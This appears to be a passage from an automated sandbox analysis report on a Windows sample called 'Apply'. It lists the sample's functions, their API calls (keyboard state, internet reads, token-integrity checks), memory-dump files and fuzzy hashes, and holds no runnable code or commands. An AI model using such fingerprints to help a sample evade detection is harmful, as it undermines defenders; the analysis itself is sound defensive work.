Part of subcall function 0086FAC6: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,008C172C,?,7529E610), ref: 0086FAE3
Part of subcall function 0086FAC6: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,008B00EB,00000000,00000000,?,?,008C172C,?,7529E610,?,008B00EB), ref: 0086FB0A

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
String ID:
API String ID: 666041331-0
Opcode ID: 5b02f9299e72908234574eaa5f522f8b1822aca3e2863d26fdce0d7c7e9eab43
Instruction ID: be776de748b190e93fc629d736068586dc9520e228e505949804ed2bbd571e7d
Opcode Fuzzy Hash: 5b02f9299e72908234574eaa5f522f8b1822aca3e2863d26fdce0d7c7e9eab43
Instruction Fuzzy Hash: F6513834600205DFCB01DF58C494CA9BBB4FF09354B0581A9E85AEB762DB31ED86CF92

Function 008E7241 Relevance: 7.6, APIs: 5, Instructions: 131windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(00000002,000000F0,?), ref: 008E72FE
SetWindowLongW.USER32(?,000000EC,?), ref: 008E7315
SendMessageW.USER32(00000002,00001036,00000000,?), ref: 008E733E
ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,008CB2E8,00000000,00000000), ref: 008E7363
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 008E7392

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: Window$Long$MessageSendShow
String ID:
API String ID: 3688381893-0
Opcode ID: ab1b510b7344d4f69507b764b2cf29410f8b6d483896b1001c7581e3188a368e
Instruction ID: 89cc128e9e7c4e381e38f6296ea82a5bc7f11f4ee270a8f2ab7ef91aaa86bded
Opcode Fuzzy Hash: ab1b510b7344d4f69507b764b2cf29410f8b6d483896b1001c7581e3188a368e
Instruction Fuzzy Hash: B3418135A08284ABD725CF69CC84FA57B65FB46350F150264FA1AEB3E1C770AD41DA50

Function 00882311 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00882383
_free.LIBCMT ref: 008823A3

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 311166bc14e2161d9a4ba2871e3bdf042c457ebf6b5bfa35109ce2a0de48fbfc
Instruction ID: 85bb59a8f9c45601cb40e8f8723a3918c2c425f3c60029908dc2f01e0a63e250
Opcode Fuzzy Hash: 311166bc14e2161d9a4ba2871e3bdf042c457ebf6b5bfa35109ce2a0de48fbfc
Instruction Fuzzy Hash: CB41D272A002049FCB20EF78C891A6EB7E5FF89724F1585A9E515EB391DB31ED01CB91

Function 0085135A Relevance: 7.6, APIs: 5, Instructions: 121keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 0085136E
ScreenToClient.USER32(00000000,?), ref: 0085138B
GetAsyncKeyState.USER32(00000001), ref: 008513C2
GetAsyncKeyState.USER32(00000002), ref: 008513DC

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
String ID:
API String ID: 4210589936-0
Opcode ID: bfe5a392a937a25c3252c0c16465205d5ff28efc9e1f7f16b9f80a54692916b0
Instruction ID: 30d219a5eaca44c0ce40a1d69e0aa34da3fa03318503a24f47f82b8650bd8f82
Opcode Fuzzy Hash: bfe5a392a937a25c3252c0c16465205d5ff28efc9e1f7f16b9f80a54692916b0
Instruction Fuzzy Hash: AA415F71A0421AFBDF05AF68C848BEEB775FB05324F248229E825E7290D7345D54DB91

Function 008CD689 Relevance: 7.6, APIs: 5, Instructions: 93networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 008CD6A7
InternetReadFile.WININET(?,00000000,?,?), ref: 008CD6DE
GetLastError.KERNEL32(?,00000000,?,?,?,008CC98D,00000000), ref: 008CD723
SetEvent.KERNEL32(?,?,00000000,?,?,?,008CC98D,00000000), ref: 008CD737
SetEvent.KERNEL32(?,?,00000000,?,?,?,008CC98D,00000000), ref: 008CD761

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: EventInternet$AvailableDataErrorFileLastQueryRead
String ID:
API String ID: 3191363074-0
Opcode ID: 3e753dab0a4ef450b1772a450a879f7b5b0d86e6f607e0fa97a554e717092110
Instruction ID: f159324e287e2eb14b0b39e65b300f0ba285a719c4305e95902c425e4f4cd1f7
Opcode Fuzzy Hash: 3e753dab0a4ef450b1772a450a879f7b5b0d86e6f607e0fa97a554e717092110
Instruction Fuzzy Hash: E9313871500309EFDB24EFA5D884EAABBF8FB14354B10842EE50AD7550E730EE45DBA0

Function 0088D10E Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 0088D117
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0088D13A

Part of subcall function 00883B70: RtlAllocateHeap.NTDLL(00000000,?,?,?,00876A59,?,0000015D,?,?,?,?,00878590,000000FF,00000000,?,?), ref: 00883BA2

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0088D160
_free.LIBCMT ref: 0088D173
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0088D182

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: 6b1e48d2ba88e2a5de5e1936bb749f936b0cf357c34268953d95c76c24655601
Instruction ID: eb8e6078d147fb962f84a7965ceee226559b35f9d34c6f4d00815fd10f104204
Opcode Fuzzy Hash: 6b1e48d2ba88e2a5de5e1936bb749f936b0cf357c34268953d95c76c24655601
Instruction Fuzzy Hash: 2D0171B66017597F2321767A5C8CC7BBA6DFEC6BA0314012AB904CA2A4EA618C0182B1

Function 0086986F Relevance: 7.6, APIs: 5, Instructions: 66COMMON

Download Yara Rule

APIs

ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 008698C9
SelectObject.GDI32(?,00000000), ref: 008698D8
BeginPath.GDI32(?), ref: 008698EF
SelectObject.GDI32(?,00000000), ref: 00869918

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: f11a42a5f8225fe6d6ae13a493e49baabf46d418d040616b9d3db34c57b40f7e
Instruction ID: 5858c1bbc79a382893ac2d45cfdc043e4fb66547a16fe1abe69b283d95e0fc55
Opcode Fuzzy Hash: f11a42a5f8225fe6d6ae13a493e49baabf46d418d040616b9d3db34c57b40f7e
Instruction Fuzzy Hash: 2021B034819709FBDB219F14DE45769BB69FB02321F15022AF454D71F0D3704986EB91

Function 00883148 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(0000000A,?,?,00882B6D,0087543F,0000000A,?,00000000,00000000,?,00000000,?,?,?,0000000A,00000000), ref: 0088314D
_free.LIBCMT ref: 00883182
_free.LIBCMT ref: 008831A9
SetLastError.KERNEL32(00000000,?,00000000,?,?,?,0000000A,00000000), ref: 008831B6
SetLastError.KERNEL32(00000000,?,00000000,?,?,?,0000000A,00000000), ref: 008831BF

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: f2a5475303f8d23c2a8aa1b590e0ec6c8605c067e7b19fa7d9651fee5260cdc7
Instruction ID: 1bfc81869a0f78e85573211da35a47b6b68616cb1f773f8f745672714166d664
Opcode Fuzzy Hash: f2a5475303f8d23c2a8aa1b590e0ec6c8605c067e7b19fa7d9651fee5260cdc7
Instruction Fuzzy Hash: 8C01F47A20971077D22277396C8DD6B356DFBD0F747200128FC15D6281EF618E065362

Function 008B0695 Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,008B05C8,80070057,?,?,?,008B09E5), ref: 008B06B2
ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,008B05C8,80070057,?,?), ref: 008B06CD
lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,008B05C8,80070057,?,?), ref: 008B06DB
CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,008B05C8,80070057,?), ref: 008B06EB
CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,008B05C8,80070057,?,?), ref: 008B06F7

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: From$Prog$FreeStringTasklstrcmpi
String ID:
API String ID: 3897988419-0
Opcode ID: 02f4892651e0be92215a04fb7dd7b204dfcfb5d814b2826844fdbcef271de05f
Instruction ID: 79fcd6c97da54c54b4686848081627fc59511f796a99796a5214dc60136cb301
Opcode Fuzzy Hash: 02f4892651e0be92215a04fb7dd7b204dfcfb5d814b2826844fdbcef271de05f
Instruction Fuzzy Hash: AD017872600325AFDB105F64CC88ADA7BADFF88791F140424F905DA310EB71DD509BA0

Function 008BEFBC Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?), ref: 008BEFD8
QueryPerformanceFrequency.KERNEL32(?), ref: 008BEFE6
Sleep.KERNEL32(00000000), ref: 008BEFEE
QueryPerformanceCounter.KERNEL32(?), ref: 008BEFF8
Sleep.KERNEL32 ref: 008BF034

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: 620faa4df0ded931325cc33d6368f6527e529cfc5cc84c4e7b8ba6b8d8880882
Instruction ID: cefae9cb3900999db983178f2c07f9def13f1d61dd9a180c357a27f8d0259d05
Opcode Fuzzy Hash: 620faa4df0ded931325cc33d6368f6527e529cfc5cc84c4e7b8ba6b8d8880882
Instruction Fuzzy Hash: 33012971C05A1DDBCF00AFA5DC889EDFBB8FB0D715F010055EA02F6251CB3095599761

Function 008B17DB Relevance: 7.5, APIs: 5, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 008B17F6
GetLastError.KERNEL32(?,00000000,00000000,?,?,008B127D,?,?,?), ref: 008B1802
GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,008B127D,?,?,?), ref: 008B1811
HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,008B127D,?,?,?), ref: 008B1818
GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 008B182F

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: HeapObjectSecurityUser$AllocErrorLastProcess
String ID:
API String ID: 842720411-0
Opcode ID: d8b863ea6ead47d00e8356a301edc2ff059bf3e72b9b2f398165d64b7282b88d
Instruction ID: af19b22ca76aafc69ffe1dc98122da07e7c0a3d52aa89044e7e72bd08ed44f3b
Opcode Fuzzy Hash: d8b863ea6ead47d00e8356a301edc2ff059bf3e72b9b2f398165d64b7282b88d
Instruction Fuzzy Hash: 410169B5200305BFDB114FA4EC88AAA3B7EFF893A0B250428F845CB360DA31DC40CA60

Function 008B1696 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 008B16AC
GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 008B16B8
GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 008B16C7
HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 008B16CE
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 008B16E4

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: b860c07ef3d5951ec737865730d34ae38a98c6ca51b33b7b76c02184d5c67c2b
Instruction ID: 34e902373fe6de125eb8f74405d83cf3e0c6ae152d4bdbb83a4d5f9bc78c2fe0
Opcode Fuzzy Hash: b860c07ef3d5951ec737865730d34ae38a98c6ca51b33b7b76c02184d5c67c2b
Instruction Fuzzy Hash: F1F0497A200341AFDB115FA59C8DF973BADFF8A760F540414FA55CF2A1DA70DC048A60

Function 008B16F6 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 008B170C
GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 008B1718
GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 008B1727
HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 008B172E
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 008B1744

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 7239982eedb3abf60d0af1669e097264ae9122ac019936b53d1cc148b09468f0
Instruction ID: c17147962a15291f9d6321781884c84818aabb177c9412b88ac47c4a3d7df5fb
Opcode Fuzzy Hash: 7239982eedb3abf60d0af1669e097264ae9122ac019936b53d1cc148b09468f0
Instruction Fuzzy Hash: 31F0377A200302ABDB125BA4EC9DA963BADFF89660F100414FA55CB2A0DA70D9048A60

Function 008C09E0 Relevance: 7.5, APIs: 6, Instructions: 41COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?,?,?,?,008C084E,?,008C3A6B,?,00000001,00893E59,?), ref: 008C09F5
CloseHandle.KERNEL32(?,?,?,?,008C084E,?,008C3A6B,?,00000001,00893E59,?), ref: 008C0A02
CloseHandle.KERNEL32(?,?,?,?,008C084E,?,008C3A6B,?,00000001,00893E59,?), ref: 008C0A0F
CloseHandle.KERNEL32(?,?,?,?,008C084E,?,008C3A6B,?,00000001,00893E59,?), ref: 008C0A1C
CloseHandle.KERNEL32(?,?,?,?,008C084E,?,008C3A6B,?,00000001,00893E59,?), ref: 008C0A29
CloseHandle.KERNEL32(?,?,?,?,008C084E,?,008C3A6B,?,00000001,00893E59,?), ref: 008C0A36

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: f0bec25ffa8ee675cdc80271f2a99e2fd07d80f8e77790299c51e8e8db407e80
Instruction ID: 90f22c268623db10d0f58c3a5e2ff5a833942a7a5b13ab1ba11e471bf07b1bca
Opcode Fuzzy Hash: f0bec25ffa8ee675cdc80271f2a99e2fd07d80f8e77790299c51e8e8db407e80
Instruction Fuzzy Hash: 2A019071800B55DFCB309F66D880816FAF5FF602553158A3ED19792921C7B0A988CE80

Function 008B633D Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 008B6351
GetWindowTextW.USER32(00000000,?,00000100), ref: 008B6368
MessageBeep.USER32(00000000), ref: 008B6380
KillTimer.USER32(?,0000040A), ref: 008B639C
EndDialog.USER32(?,00000001), ref: 008B63B6

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: BeepDialogItemKillMessageTextTimerWindow
String ID:
API String ID: 3741023627-0
Opcode ID: 680b55c8b755efeb86c129a9df0d12201bf1d0d9882801bcdd14ecfbe399a8d4
Instruction ID: fe923189e424a725c569c16072f15e8d2a4f04aff09a89a5e00ff997a8cd0304
Opcode Fuzzy Hash: 680b55c8b755efeb86c129a9df0d12201bf1d0d9882801bcdd14ecfbe399a8d4
Instruction Fuzzy Hash: C501A430500704ABEB315B50DD8EBD67BB8FF14706F040659F586E52E1EBF4A958CB90

Function 0088DA8B Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0088DAA3

Part of subcall function 00882D18: RtlFreeHeap.NTDLL(00000000,00000000,?,0088DB22,00921DB4,00000000,00921DB4,00000000,?,0088DB49,00921DB4,00000007,00921DB4,?,0088DF46,00921DB4), ref: 00882D2E
Part of subcall function 00882D18: GetLastError.KERNEL32(00921DB4,?,0088DB22,00921DB4,00000000,00921DB4,00000000,?,0088DB49,00921DB4,00000007,00921DB4,?,0088DF46,00921DB4,00921DB4), ref: 00882D40

_free.LIBCMT ref: 0088DAB5
_free.LIBCMT ref: 0088DAC7
_free.LIBCMT ref: 0088DAD9
_free.LIBCMT ref: 0088DAEB

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 121245ea7c044955f138100b032527f23fcc72a8e7c677bc96b17f70f15039ad
Instruction ID: bbd22ff653b6b943cc86404030c7c04378937e5fbee1ccf3b20aee4396099556
Opcode Fuzzy Hash: 121245ea7c044955f138100b032527f23fcc72a8e7c677bc96b17f70f15039ad
Instruction Fuzzy Hash: A4F0123265A329AB9624FB5CE585C5AB7DDFF007607B48845F409D7981CB30FC809BA1

Function 00882560 Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0088257E

Part of subcall function 00882D18: RtlFreeHeap.NTDLL(00000000,00000000,?,0088DB22,00921DB4,00000000,00921DB4,00000000,?,0088DB49,00921DB4,00000007,00921DB4,?,0088DF46,00921DB4), ref: 00882D2E
Part of subcall function 00882D18: GetLastError.KERNEL32(00921DB4,?,0088DB22,00921DB4,00000000,00921DB4,00000000,?,0088DB49,00921DB4,00000007,00921DB4,?,0088DF46,00921DB4,00921DB4), ref: 00882D40

_free.LIBCMT ref: 00882590
_free.LIBCMT ref: 008825A3
_free.LIBCMT ref: 008825B4
_free.LIBCMT ref: 008825C5

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
